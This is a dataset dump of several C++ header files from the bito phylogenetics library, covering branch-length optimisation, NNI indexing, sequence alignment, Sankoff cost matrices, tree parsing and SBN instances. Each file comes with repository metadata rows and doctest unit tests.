logspace_gradient_ascent_func; } LogLikelihoodAndDerivativeFunc GetLogSpaceGradientAscentFunc() { return logspace_gradient_ascent_func_; } // Set helper function for Newton-Raphson. Function takes a log branch length and // returns the log likelihood and the first two derivatives. void SetNewtonRaphsonFunc( LogLikelihoodAndFirstTwoDerivativesFunc newton_raphson_func) { newton_raphson_func_ = newton_raphson_func; } LogLikelihoodAndFirstTwoDerivativesFunc GetNewtonRaphsonFunc() { return newton_raphson_func_; } // ** Branch Length Optimization // Performs optimization on given branch. Parent_id expects the parent node's RFocal // PV. Child_id expects the child node's P PV. void OptimizeBranchLength(const EdgeId edge_id, const PVId parent_rfocal_pvid, const PVId child_p_pvid, const bool check_branch_convergence = true); // ** Branch Length Map // Build a map from PCSP bitset to branch length. using BranchLengthMap = std::map<Bitset, double>; BranchLengthMap BuildBranchLengthMap(const GPDAG& dag) const; // Copy over branch lengths from map by corresponding PCSPs. Only applies branch // lengths for PCSPs which occur in DAG, all others left unchanged. All edges in map // must exist in dag. void ApplyBranchLengthMap(const BranchLengthMap& branch_length_map, const GPDAG& dag); // ** Static Functions // Builds a tree using given branch lengths on a given topology. For each edge, builds // out PCSP bitset to find corresponding DAG EdgeId, to find branch length. static RootedTree BuildTreeWithBranchLengthsFromTopology( const GPDAG& dag, const DAGBranchHandler& dag_branch_handler, const Node::Topology& topology); // Copies branch lengths from one handler to another. Base DAG of dest handler must be // a subgraph of src handler. static void CopyOverBranchLengths(const DAGBranchHandler& src, DAGBranchHandler& dest); protected: // ** Branch Length Optimization Helpers void BrentOptimization(const EdgeId edge_id, const PVId parent_id, const PVId child_id); void BrentOptimizationWithGradients(const EdgeId edge_id, const PVId parent_id, const PVId child_id); void GradientAscentOptimization(const EdgeId edge_id, const PVId parent_id, const PVId child_id); void LogSpaceGradientAscentOptimization(const EdgeId edge_id, const PVId parent_id, const PVId child_id); void NewtonRaphsonOptimization(const EdgeId edge_id, const PVId parent_id, const PVId child_id); // Branch Lengths. DAGEdgeDoubleData branch_lengths_; // Tracks differences between branch length over different iterations of // optimization to test for edge-wise convergence. DAGEdgeDoubleData differences_; // Unowned DAG reference. GPDAG* dag_ = nullptr; // Unowned GraftDAG reference. GraftDAG* graft_dag_ = nullptr; // Optimization pass counter. Tracks number of iterations of optimization. size_t optimization_count_ = 0; // Method used in branch length optimization. OptimizationMethod optimization_method_ = OptimizationMethod::BrentOptimization; // Default branch length set at initialization. Current branch lengths are stored // in branch_lengths_. static constexpr double init_default_branch_length_ = 0.1; // Default difference set at initialization. Current branch lengths are stored // in differences_. static constexpr double init_default_difference_ = 0.0; // Absolute lower bound for possible branch lengths during optimization (in log // space). static constexpr double min_log_branch_length_ = -13.9; // Absolute upper bound for possible branch lengths during optimization (in log // space). static constexpr double max_log_branch_length_ = 1.1; // Precision used for checking convergence of branch length optimization. // In the non-Brent optimization methods, significant digits will be used to // determine convergence through relative tolerance, i.e. measuring difference // from previous branch length values until the absolute difference is below // 10^(-significant_digits_for_optimization_). // Brent optimization does not define convergence through relative tolerance, // rather convergence based on tightness of the brackets that it adapts during // optimization. This variable thus represents the "number of bits precision to // which the minima should be found". When testing on sample datasets, we found that // setting the value to 10 was a good compromise between speed and precision for // Brent. See more on Brent optimization here: // https://www.boost.org/doc/libs/1_79_0/libs/math/doc/html/math_toolkit/brent_minima.html int significant_digits_for_optimization_ = 10; double relative_tolerance_for_optimization_ = 1e-4; double denominator_tolerance_for_newton_ = 1e-10; double step_size_for_optimization_ = 5e-4; double step_size_for_log_space_optimization_ = 1.0005; // Number of iterations allowed for branch length optimization. size_t max_iter_for_optimization_ = 1000; double branch_length_difference_threshold_ = 1e-15; // Evaluation Functions NegLogLikelihoodFunc brent_nongrad_func_ = nullptr; NegLogLikelihoodAndDerivativeFunc brent_grad_func_ = nullptr; LogLikelihoodAndDerivativeFunc gradient_ascent_func_ = nullptr; LogLikelihoodAndDerivativeFunc logspace_gradient_ascent_func_ = nullptr; LogLikelihoodAndFirstTwoDerivativesFunc newton_raphson_func_ = nullptr; }; #ifdef DOCTEST_LIBRARY_INCLUDED #endif // DOCTEST_LIBRARY_INCLUDED
13,968
C++
.h
270
47.181481
92
0.748701
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,112
nni_engine_key_index.hpp
phylovi_bito/src/nni_engine_key_index.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // NNI Engine Key Index // Map for storing important key indices for NNI Likelihood computation of proposed // NNIs. Creates a mapping of specified NodeId, EdgeId, and PVIds from pre-NNI to // post-NNI. #pragma once #include "sugar.hpp" #include "subsplit_dag_storage.hpp" // ** Key Indexing // These function finds mapping from current NNIs contained in DAG to proposed NNI. enum class NNIEngineKeyIndex : size_t { Parent_Id, Child_Id, Edge, Parent_RHat, Parent_RFocal, Parent_PHatSister, Child_P, Child_PHatLeft, Child_PHatRight, }; static const size_t NNIEngineKeyIndexCount = 9; class NNIEngineKeyIndexEnum : public EnumWrapper<NNIEngineKeyIndex, size_t, NNIEngineKeyIndexCount, NNIEngineKeyIndex::Parent_Id, NNIEngineKeyIndex::Child_PHatRight> {}; using NNIEngineKeyIndexMap = NNIEngineKeyIndexEnum::Array<size_t>; using NNIEngineKeyIndexMapPair = std::pair<NNIEngineKeyIndexMap, NNIEngineKeyIndexMap>; using NNIEngineKeyIndexPairArray = std::array<std::pair<NNIEngineKeyIndex, NNIEngineKeyIndex>, 3>; enum class NNIEngineNodeIndex : size_t { Grandparent, Parent, Child, Sister, LeftChild, RightChild, }; static const size_t NNIEngineNodeIndexCount = 6; class NNIEngineNodeIndexEnum : public EnumWrapper<NNIEngineNodeIndex, size_t, NNIEngineNodeIndexCount, NNIEngineNodeIndex::Grandparent, NNIEngineNodeIndex::RightChild> {}; using NNIEngineNodeIndexMap = NNIEngineNodeIndexEnum::Array<NodeId>; enum class NNIEngineEdgeIndex : size_t { Parent, Central, Sister, LeftChild, RightChild }; static const size_t NNIEngineEdgeIndexCount = 5; class NNIEngineEdgeIndexEnum : public EnumWrapper<NNIEngineEdgeIndex, size_t, NNIEngineEdgeIndexCount, NNIEngineEdgeIndex::Parent, NNIEngineEdgeIndex::RightChild> {}; using NNIEngineEdgeIndexMap = NNIEngineEdgeIndexEnum::Array<EdgeId>;
2,088
C++
.h
58
31.775862
88
0.757411
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,113
alignment.hpp
phylovi_bito/src/alignment.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. #pragma once #include <string> #include <utility> #include "sugar.hpp" class Alignment { public: Alignment() = default; explicit Alignment(StringStringMap data) : data_(std::move(data)) {} // Return map of taxon names to sequence alignments. StringStringMap Data() const { return data_; } // Return list of names. std::set<std::string> GetNames() const; // Number of taxon sequences in data map. size_t SequenceCount() const { return data_.size(); } // The length of the sequence alignments. size_t Length() const; // Compare if alignments have same name and sequence data. bool operator==(const Alignment& other) const { return data_ == other.Data(); } // Is the alignment non-empty and do all sequences have the same length? bool IsValid() const; // Get alignment sequence by taxon name. const std::string& at(const std::string& taxon) const; // Load fasta file into Alignment. static Alignment ReadFasta(const std::string& fname); // Create a new alignment Alignment ExtractSingleColumnAlignment(size_t which_column) const; static Alignment HelloAlignment() { return Alignment({{"mars", "CCGAG-AGCAGCAATGGAT-GAGGCATGGCG"}, {"saturn", "GCGCGCAGCTGCTGTAGATGGAGGCATGACG"}, {"jupiter", "GCGCGCAGCAGCTGTGGATGGAAGGATGACG"}}); } private: // - Map of alignments: [ taxon name -> alignment sequence ] StringStringMap data_; }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("Alignment") { auto alignment = Alignment::ReadFasta("data/hello.fasta"); CHECK_EQ(alignment, Alignment::HelloAlignment()); CHECK(alignment.IsValid()); CHECK_THROWS(alignment.ExtractSingleColumnAlignment(31)); Alignment first_col_expected = Alignment({{"mars", "C"}, {"saturn", "G"}, {"jupiter", "G"}}); CHECK_EQ(alignment.ExtractSingleColumnAlignment(0), first_col_expected); } #endif // DOCTEST_LIBRARY_INCLUDED
2,024
C++
.h
48
38.583333
81
0.721545
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,114
mmapped_plv.hpp
phylovi_bito/src/mmapped_plv.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // RAII class for partial likelihood vectors that are mmapped to disk. // // This class is to allocate a very large partial likelihood vector in virtual memory // and then cut it up (via Subdivide) into a vector of partial likelihood vectors. #pragma once #include "eigen_sugar.hpp" #include "mmapped_matrix.hpp" using NucleotidePLV = Eigen::Matrix<double, 4, Eigen::Dynamic, Eigen::ColMajor>; using NucleotidePLVRef = Eigen::Ref<NucleotidePLV>; using NucleotidePLVRefVector = std::vector<NucleotidePLVRef>; class MmappedNucleotidePLV { public: constexpr static Eigen::Index base_count_ = 4; MmappedNucleotidePLV(const std::string &file_path, Eigen::Index total_plv_length) : mmapped_matrix_(file_path, base_count_, total_plv_length){}; void Resize(Eigen::Index total_plv_length) { mmapped_matrix_.ResizeMMap(base_count_, total_plv_length); } NucleotidePLVRefVector Subdivide(size_t into_count) { Assert(into_count > 0, "into_count is zero in MmappedNucleotidePLV::Subdivide."); auto entire_plv = mmapped_matrix_.Get(); const auto total_plv_length = entire_plv.cols(); Assert(total_plv_length % into_count == 0, "into_count isn't a multiple of total PLV length in " "MmappedNucleotidePLV::Subdivide."); const size_t block_length = total_plv_length / into_count; NucleotidePLVRefVector sub_plvs; sub_plvs.reserve(into_count); for (size_t idx = 0; idx < into_count; ++idx) { sub_plvs.push_back( entire_plv.block(0, idx * block_length, base_count_, block_length)); } return sub_plvs; } size_t ByteCount() const { return mmapped_matrix_.ByteCount(); } private: MmappedMatrix<NucleotidePLV> mmapped_matrix_; }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("MmappedNucleotidePLV") { MmappedNucleotidePLV mmapped_plv("_ignore/mmapped_plv.data", 10); auto plvs = mmapped_plv.Subdivide(2); for (const auto &plv : plvs) { CHECK_EQ(plv.rows(), MmappedNucleotidePLV::base_count_); CHECK_EQ(plv.cols(), 5); } } #endif // DOCTEST_LIBRARY_INCLUDED
2,188
C++
.h
51
39.313725
85
0.728726
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,115
sankoff_matrix.hpp
phylovi_bito/src/sankoff_matrix.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // Cost Matrix for Sankoff Algorithm // cost_matrix[i][j] is the cost of mutating from parent state i to child state j #pragma once #include "eigen_sugar.hpp" #include "sugar.hpp" using CostMatrix = Eigen::Matrix<double, 4, 4>; class SankoffMatrix { public: static const size_t state_count = 4; // default matrix is all ones except for zeroes on the diagonal SankoffMatrix() : cost_matrix_(CostMatrix()) { cost_matrix_.setOnes(); for (size_t state = 0; state < state_count; state++) { cost_matrix_(state, state) = 0.; } }; SankoffMatrix(CostMatrix cost_matrix) { for (size_t state = 0; state < state_count; state++) { Assert(fabs(cost_matrix(state, state) - 0.) < 1e-10, "Diagnonal of cost matrix should be 0."); } cost_matrix_ = std::move(cost_matrix); } void UpdateMatrix(size_t parent_state, size_t child_state, double cost) { Assert(parent_state != child_state, "Mutating from state " + std::to_string(parent_state) + " to state " + std::to_string(child_state) + " should have cost of 0."); cost_matrix_(parent_state, child_state) = cost; }; double GetCost(size_t parent_state, size_t child_state) { return cost_matrix_(parent_state, child_state); }; CostMatrix GetMatrix() { return cost_matrix_; }; private: CostMatrix cost_matrix_; }; #ifdef DOCTEST_LIBRARY_INCLUDED enum Nucleotides { A, C, G, T }; TEST_CASE("SankoffMatrix: Testing SankoffMatrix Getter/Setter Methods") { auto cm = SankoffMatrix(); CHECK_LT(fabs(cm.GetCost(0, 0) - 0.), 1e-10); CHECK_LT(fabs(cm.GetCost(G, C) - 1.), 1e-10); cm.UpdateMatrix(A, G, 3.); auto test_matrix = Eigen::Matrix<double, 4, 4>(); test_matrix << 0., 1., 3., 1., 1., 0., 1., 1., 1., 1., 0., 1., 1., 1., 1., 0.; CHECK(test_matrix.isApprox(cm.GetMatrix())); CHECK_LT(fabs(cm.GetCost(A, G) - 3.), 1e-10); CHECK_THROWS(cm.UpdateMatrix(G, G, 3.)); } TEST_CASE("SankoffMatrix: Create SankoffMatrix from given cost matrix") { auto costs = Eigen::Matrix<double, 4, 4>(); costs << 0., 2.5, 1., 2.5, 2.5, 0., 2.5, 1., 1., 2.5, 0., 2.5, 2.5, 1., 2.5, 0.; auto cm = SankoffMatrix(costs); CHECK_LT(fabs(cm.GetCost(A, C) - 2.5), 1e-10); auto costs_invalid = Eigen::Matrix<double, 4, 4>(); // non-zero values on diagonal costs_invalid << 1., 2., 3., 4., 5., 6., 7., 8., 9., 10., 11., 12., 13., 14., 15., 16.; CHECK_THROWS(new SankoffMatrix(costs_invalid)); } #endif // DOCTEST_LIBRARY_INCLUDED
2,615
C++
.h
64
37.265625
84
0.648148
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,116
driver.hpp
phylovi_bito/src/driver.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // This class drives tree parsing. #pragma once #include <map> #include <memory> #include <string> #include <vector> #include "parser.hpp" #include "sugar.hpp" #include "tree_collection.hpp" // Give Flex the prototype of yylex we want ... #define YY_DECL yy::parser::symbol_type yylex(Driver& drv) // ... and declare it for the parser's sake. YY_DECL; // Conducting the scanning and parsing of trees. // Note that this class is only for parsing a collection of trees on the same // taxon set. class Driver { public: Driver(); // These member variables are public so that the parser and lexer can access them. // Nevertheless, the reasonable thing to do is to interact with this class from the // outside using the public method interface below. // The next available id for parsing the first tree. uint32_t next_id_; // Do we want to enforce taxa IDs to be alphabetically sorted according to their // names? bool sort_taxa_; // Do we already have the taxon names in taxa_? If not, they get initialized with the // first tree parsed. bool taxa_complete_; // Debug level for parser. int trace_parsing_; // Whether to generate scanner debug traces. bool trace_scanning_; // The most recent tree parsed. std::shared_ptr<Tree> latest_tree_; // Map from taxon names to their numerical identifiers. std::map<std::string, uint32_t> taxa_; // The token's location, used by the scanner to give good debug info. TagDoubleMap branch_lengths_; // The token's location, used by the scanner to give good debug info. yy::location location_; // These three parsing methods also remove quotes from Newick strings and Nexus files. // Make a parser and then parse a string for a one-off parsing. TreeCollection ParseString(const std::string& s); // Run the parser on a Newick file. TreeCollection ParseNewickFile(const std::string& fname); // Run the parser on a gzip-ed Newick file. TreeCollection ParseNewickFileGZ(const std::string& fname); // Run the parser on a Nexus file. The Nexus file must have a translate block, and the // leaf tags are assigned according to the order of names in the translate block. TreeCollection ParseNexusFile(const std::string& fname); // Run the parser on a gzip-ed Nexus file. Check ParseNexusFile() for details. TreeCollection ParseNexusFileGZ(const std::string& fname); // Clear out stored state. void Clear(); // Make the map from the edge tags of the tree to the taxon names from taxa_. TagStringMap TagTaxonMap(); // Set whether to sort taxon IDs in map according to taxon names. void SetSortTaxa(const bool taxa_sorted) { sort_taxa_ = taxa_sorted; } // Set taxon map. void SetTaxa(const std::map<std::string, uint32_t> taxa); private: // Scan a string with flex. void ScanString(const std::string& str); // Parse a string with an existing parser object. Tree ParseString(yy::parser* parser_instance, const std::string& str); // Run the parser on a Newick stream. TreeCollection ParseNewick(std::istream& in); // Runs ParseNewick() and dequotes the resulting trees. TreeCollection ParseAndDequoteNewick(std::istream& in); // Run the parser on a Nexus stream. TreeCollection ParseNexus(std::istream& in); // Sort taxa map so that IDs correspond to name's sorted order. void SortTaxa(); }; #ifdef DOCTEST_LIBRARY_INCLUDED TEST_CASE("Driver") { Driver driver; std::vector<std::string> newicks = { "(a:0,b:0,c:0,d:0):0;", "((b:0,a:0):0,c:0):0;", "((a:1.1,b:2):0.4,c:3):0;", "(x:0,(a:1.1,(b:2,(quack:0.1,duck:0):0):0):0,c:3):1.1;", }; for (const auto& newick : newicks) { auto collection = driver.ParseString(newick); CHECK_EQ(newick, collection.Trees()[0].Newick(collection.TagTaxonMap())); } driver.Clear(); // Note that the order of the taxa is given by the order in the translate table, not // by the short names. We use that here to make sure that the ordering of the taxa is // the same as that in the newick file below so that they can be compared. auto nexus_collection = driver.ParseNexusFile("data/DS1.subsampled_10.t.reordered"); CHECK_EQ(nexus_collection.TreeCount(), 10); driver.Clear(); auto newick_collection = driver.ParseNewickFile("data/DS1.subsampled_10.t.nwk"); CHECK_EQ(nexus_collection, newick_collection); driver.Clear(); auto newick_collection_gz = driver.ParseNewickFileGZ("data/DS1.subsampled_10.t.nwk.gz"); CHECK_EQ(nexus_collection, newick_collection_gz); driver.Clear(); auto five_taxon = driver.ParseNewickFile("data/five_taxon_unrooted.nwk"); std::vector<std::string> correct_five_taxon_names({"x0", "x1", "x2", "x3", "x4"}); CHECK_EQ(five_taxon.TaxonNames(), correct_five_taxon_names); // Check that we can parse BEAST trees with [&comments], and that the different // formatting of the translate block doesn't trip us up. auto beast_nexus = driver.ParseNexusFile("data/test_beast_tree_parsing.nexus"); // These are the taxa, in order, taken directly from the nexus file: StringVector beast_taxa = { "aDuckA_1976", "aDuckB_1977", "aItaly_1987", "aMallard_1985", "hCHR_1983", "hCambr_1939", "hFortMon_1947", "hKiev_1979", "hLenin_1954", "hMongol_1985", "hMongol_1991", "hNWS_1933", "hPR_1934", "hSCar_1918.00", "hScot_1994", "hSuita_1989", "hUSSR_1977", "sEhime_1980", "sIllino_1963", "sIowa_1930", "sNebrask_1992", "sNewJers_1976", "sStHya_1991", "sWiscons_1961", "sWiscons_1.998e3"}; CHECK_EQ(beast_nexus.TaxonNames(), beast_taxa); // Check that we got the whole tree. for (const auto& [topology, count] : beast_nexus.TopologyCounter()) { std::ignore = count; CHECK_EQ(topology->LeafCount(), beast_taxa.size()); } auto beast_nexus_gz = driver.ParseNexusFileGZ("data/test_beast_tree_parsing.nexus.gz"); CHECK_EQ(beast_nexus, beast_nexus_gz); } #endif // DOCTEST_LIBRARY_INCLUDED
6,082
C++
.h
132
42.916667
88
0.713997
phylovi/bito
38
9
59
GPL-3.0
9/20/2024, 10:43:37 PM (Europe/Amsterdam)
false
false
false
false
false
false
false
false
1,532,117
generic_sbn_instance.hpp
phylovi_bito/src/generic_sbn_instance.hpp
// Copyright 2019-2022 bito project contributors. // bito is free software under the GPLv3; see LICENSE file for details. // // This is a shared parent class for the rooted and unrooted SBN instances, templated on // the type of trees and SBN support we need. // // The idea is to have as much in here as possible, which in practice means everything // that doesn't require explicit reference to a specific tree type. Note that this // excludes SBN training, which is different based on if we are thinking of trees as // rooted or unrooted. #pragma once #include "ProgressBar.hpp" #include "alignment.hpp" #include "csv.hpp" #include "engine.hpp" #include "mersenne_twister.hpp" #include "numerical_utils.hpp" #include "psp_indexer.hpp" #include "rooted_sbn_support.hpp" #include "sbn_probability.hpp" #include "unrooted_sbn_support.hpp" #include "phylo_flags.hpp" #include "phylo_model.hpp" #include "phylo_gradient.hpp" template <typename TTreeCollection, typename TSBNSupport, typename TIndexerRepresentation> class GenericSBNInstance { static_assert( (std::is_same<TTreeCollection, RootedTreeCollection>::value && std::is_same<TSBNSupport, RootedSBNSupport>::value && std::is_same<TIndexerRepresentation, RootedIndexerRepresentation>::value) || (std::is_same<TTreeCollection, UnrootedTreeCollection>::value && std::is_same<TSBNSupport, UnrootedSBNSupport>::value && std::is_same<TIndexerRepresentation, UnrootedIndexerRepresentation>::value)); public: // A Range is a range of values of our vector using 0-indexed Python/Numpy slice // notation, such that if we have the range (1, 3), that refers to the items with // 0-index 1 and 2. Said another way, these are considered half-open intervals // [start, end). using Range = std::pair<size_t, size_t>; using RangeVector = std::vector<Range>; // The Primary Split Pair indexer. PSPIndexer psp_indexer_; // A vector that contains all of the SBN-related probabilities. EigenVectorXd sbn_parameters_; // The trees in our SBNInstance. TTreeCollection tree_collection_; // ** Initialization and status explicit GenericSBNInstance(std::string name) : name_(std::move(name)), rescaling_(false) {} size_t TaxonCount() const { return tree_collection_.TaxonCount(); } size_t TreeCount() const { return tree_collection_.TreeCount(); } const TagStringMap &TagTaxonMap() const { return tree_collection_.TagTaxonMap(); } const StringVector &TaxonNames() const { return sbn_support_.TaxonNames(); } const TSBNSupport &SBNSupport() const { return sbn_support_; } EigenConstVectorXdRef SBNParameters() const { return sbn_parameters_; } // Return a raw pointer to the engine if it's available. Engine *GetEngine() const { if (engine_ != nullptr) { return engine_.get(); } // else Failwith( "Engine not available. Call PrepareForPhyloLikelihood to make an " "engine for phylogenetic likelihood computation computation."); } void PrintStatus() { std::cout << "Status for instance '" << name_ << "':\n"; if (TreeCount()) { std::cout << TreeCount() << " unique tree topologies loaded on " << TaxonCount() << " leaves.\n"; } else { std::cout << "No trees loaded.\n"; } std::cout << alignment_.Data().size() << " sequences loaded.\n"; } BitsetSizeDict RootsplitCounterOf(const Node::TopologyCounter &topologies) const { return TSBNSupport::RootsplitCounterOf(topologies); } PCSPCounter PCSPCounterOf(const Node::TopologyCounter &topologies) const { return TSBNSupport::PCSPCounterOf(topologies); } StringVector PrettyIndexer() const { return sbn_support_.PrettyIndexer(); } Node::TopologyCounter TopologyCounter() const { return tree_collection_.TopologyCounter(); } // ** SBN-related items void SetSBNSupport(TSBNSupport &&sbn_support) { sbn_support_ = std::move(sbn_support); sbn_parameters_.resize(sbn_support_.GPCSPCount()); sbn_parameters_.setOnes(); psp_indexer_ = sbn_support_.BuildPSPIndexer(); } // Use the loaded trees to set up the TopologyCounter, SBNSupport, etc. void ProcessLoadedTrees() { ClearTreeCollectionAssociatedState(); topology_counter_ = TopologyCounter(); SetSBNSupport(TSBNSupport(topology_counter_, tree_collection_.TaxonNames())); }; // Set the SBN parameters using a "pretty" map of SBNs. // // Any GPCSP that is not assigned a value by pretty_sbn_parameters will be assigned a // value of DOUBLE_MINIMUM (i.e. "log of 0"). We do emit a warning with this code is // used if warn_missing is on. // // We assume pretty_sbn_parameters is delivered in linear (i.e not log) space. If we // get log parameters they will have negative values, which will raise a failure. void SetSBNParameters(const StringDoubleMap &pretty_sbn_parameters, bool warn_missing = true) { StringVector pretty_indexer = PrettyIndexer(); size_t missing_count = 0; for (size_t i = 0; i < pretty_indexer.size(); i++) { // NOLINT const std::string &pretty_gpcsp = pretty_indexer[i]; const auto search = pretty_sbn_parameters.find(pretty_gpcsp); if (search == pretty_sbn_parameters.end()) { sbn_parameters_[i] = DOUBLE_MINIMUM; missing_count++; } else if (search->second > 0.) { sbn_parameters_[i] = log(search->second); } else if (search->second == 0.) { sbn_parameters_[i] = DOUBLE_MINIMUM; } else { Failwith( "Negative probability encountered in SetSBNParameters. Note that we expect " "the probabilities to be expressed in linear (not log) space."); } } if (warn_missing && missing_count > 0) { std::cout << "Warning: when setting SBN parameters, " << missing_count << " were in the support but not specified; these were set to " << DOUBLE_MINIMUM << " (parameters stored as log space)." << std::endl; } } // The support has to already be set up to accept these SBN parameters. void ReadSBNParametersFromCSV(const std::string &csv_path) { SetSBNParameters(CSV::StringDoubleMapOfCSV(csv_path)); } void CheckTopologyCounter() { if (TopologyCounter().empty()) { Failwith("Please load some trees into your SBN instance."); } } void CheckSBNSupportNonEmpty() { if (sbn_support_.Empty()) { Failwith("Please call ProcessLoadedTrees to prepare your SBN support."); } } void ProbabilityNormalizeSBNParametersInLog(EigenVectorXdRef sbn_parameters) const { sbn_support_.ProbabilityNormalizeSBNParametersInLog(sbn_parameters); } void TrainSimpleAverage() { CheckTopologyCounter(); CheckSBNSupportNonEmpty(); auto indexer_representation_counter = sbn_support_.IndexerRepresentationCounterOf(topology_counter_); SBNProbability::SimpleAverage(sbn_parameters_, indexer_representation_counter, sbn_support_.RootsplitCount(), sbn_support_.ParentToRange()); } EigenVectorXd NormalizedSBNParameters() const { EigenVectorXd sbn_parameters_result = sbn_parameters_; ProbabilityNormalizeSBNParametersInLog(sbn_parameters_result); NumericalUtils::Exponentiate(sbn_parameters_result); return sbn_parameters_result; } StringDoubleVector PrettyIndexedVector(EigenConstVectorXdRef v) { StringDoubleVector result; result.reserve(v.size()); const auto pretty_indexer = PrettyIndexer(); Assert(v.size() <= static_cast<Eigen::Index>(pretty_indexer.size()), "v is too long in PrettyIndexedVector"); for (Eigen::Index i = 0; i < v.size(); i++) { result.push_back({pretty_indexer.at(i), v(i)}); } return result; } StringDoubleVector PrettyIndexedSBNParameters() { return PrettyIndexedVector(NormalizedSBNParameters()); } void SBNParametersToCSV(const std::string &file_path) { CSV::StringDoubleVectorToCSV(PrettyIndexedSBNParameters(), file_path); } // Get indexer representations of the trees in tree_collection_. // See the documentation of IndexerRepresentationOf in sbn_maps.hpp for an // explanation of what these are. This version uses the length of // sbn_parameters_ as a sentinel value for all rootsplits/PCSPs that aren't // present in the indexer. std::vector<TIndexerRepresentation> MakeIndexerRepresentations() const { std::vector<TIndexerRepresentation> representations; representations.reserve(tree_collection_.trees_.size()); for (const auto &tree : tree_collection_.trees_) { representations.push_back(sbn_support_.IndexerRepresentationOf(tree.Topology())); } return representations; } // Calculate SBN probabilities for all currently-loaded trees. EigenVectorXd CalculateSBNProbabilities() { EigenVectorXd sbn_parameters_copy = sbn_parameters_; SBNProbability::ProbabilityNormalizeParamsInLog(sbn_parameters_copy, sbn_support_.RootsplitCount(), sbn_support_.ParentToRange()); return SBNProbability::ProbabilityOfCollection(sbn_parameters_copy, MakeIndexerRepresentations()); } // ** Phylogenetic likelihood // Get the phylogenetic model parameters as a big matrix. Eigen::Ref<EigenMatrixXd> GetPhyloModelParams() { return phylo_model_params_; } // The phylogenetic model parameters broken down into blocks according to // model structure. See test_bito.py for an example of what this does. BlockSpecification::ParameterBlockMap GetPhyloModelParamBlockMap() { return GetEngine()->GetPhyloModelBlockSpecification().ParameterBlockMapOf( phylo_model_params_); } // Set whether we use rescaling for phylogenetic likelihood computation. void SetRescaling(bool use_rescaling) { rescaling_ = use_rescaling; } void CheckSequencesAndTreesLoaded() const { if (alignment_.SequenceCount() == 0) { Failwith( "Load an alignment into your SBNInstance on which you wish to " "calculate phylogenetic likelihoods."); } if (TreeCount() == 0) { Failwith( "Load some trees into your SBNInstance on which you wish to " "calculate phylogenetic likelihoods."); } } // Prepare for phylogenetic likelihood calculation. If we get a nullopt // argument, it just uses the number of trees currently in the SBNInstance. void PrepareForPhyloLikelihood( const PhyloModelSpecification &model_specification, size_t thread_count, const std::vector<BeagleFlags> &beagle_flag_vector = {}, bool use_tip_states = true, const std::optional<size_t> &tree_count_option = std::nullopt) { const EngineSpecification engine_specification{thread_count, beagle_flag_vector, use_tip_states}; MakeGPEngine(engine_specification, model_specification); ResizePhyloModelParams(tree_count_option); } // Make the number of phylogentic model parameters fit the number of trees and // the speficied model. If we get a nullopt argument, it just uses the number // of trees currently in the SBNInstance. void ResizePhyloModelParams(std::optional<size_t> tree_count_option) { size_t tree_count = tree_count_option ? *tree_count_option : TreeCount(); if (tree_count == 0) { Failwith( "Please add trees to your instance by sampling or loading before " "preparing for phylogenetic likelihood calculation."); } phylo_model_params_.resize( tree_count, GetEngine()->GetPhyloModelBlockSpecification().ParameterCount()); } std::vector<double> UnrootedLogLikelihoods( const RootedTreeCollection &tree_collection) { return GetEngine()->UnrootedLogLikelihoods(tree_collection, phylo_model_params_, true); } // ** I/O void ReadFastaFile(const std::string &fname) { alignment_ = Alignment::ReadFasta(fname); } // Allow users to pass in alignment directly. void SetAlignment(const Alignment &alignment) { alignment_ = alignment; } void SetAlignment(Alignment &&alignment) { alignment_ = alignment; } void LoadDuplicatesOfFirstTree(size_t number_of_times) { tree_collection_ = tree_collection_.BuildCollectionByDuplicatingFirst(number_of_times); } // ** PhyloFlags // This is an object for passing option flags to functions. bool HasPhyloFlags() { return (phylo_flags_ != nullptr); } void MakePhyloFlags() { Assert(!HasPhyloFlags(), "Attempted to make PhyloFlags when instance already exists."); phylo_flags_ = std::make_unique<PhyloFlags>(); } PhyloFlags &GetPhyloFlags() { Assert(HasPhyloFlags(), "Attempted to get PhyloFlags when instance does not exist."); return *phylo_flags_.get(); } std::optional<PhyloFlags> GetPhyloFlagsIfExists() { if (HasPhyloFlags()) { return GetPhyloFlags(); } return std::nullopt; } void SetPhyloFlag(const std::string &flag_name, const bool set_to = true, const double set_value = 1.0f) { GetPhyloFlags().SetFlag(flag_name, set_to, set_value); } void SetPhyloFlagDefaults(const bool is_set_defaults) { GetPhyloFlags().SetRunDefaultsFlag(is_set_defaults); } void ClearPhyloFlags() { GetPhyloFlags().ClearFlags(); } // Merge external and internal flags into single unified flag set. std::optional<PhyloFlags> CollectPhyloFlags( std::optional<PhyloFlags> external_flags = std::nullopt) { std::optional<PhyloFlags> internal_flags = GetPhyloFlagsIfExists(); std::optional<PhyloFlags> flags; // If there are both external and internal flags, combine them. if (internal_flags && external_flags) { flags = external_flags; flags.value().AddPhyloFlags(internal_flags, false); return flags; } // Otherwise, return the existing flags (or null). return internal_flags ? internal_flags : external_flags; } protected: // The name of our bito instance. std::string name_; // Our phylogenetic likelihood computation engine. std::unique_ptr<Engine> engine_; // Option flags for passing to likelihood computation engine. std::unique_ptr<PhyloFlags> phylo_flags_ = nullptr; // Whether we use likelihood vector rescaling. bool rescaling_; // The multiple sequence alignment. Alignment alignment_; // The phylogenetic model parameterization. This has as many rows as there are // trees, and holds the parameters before likelihood computation, where they // will be processed across threads. EigenMatrixXd phylo_model_params_; // A counter for the 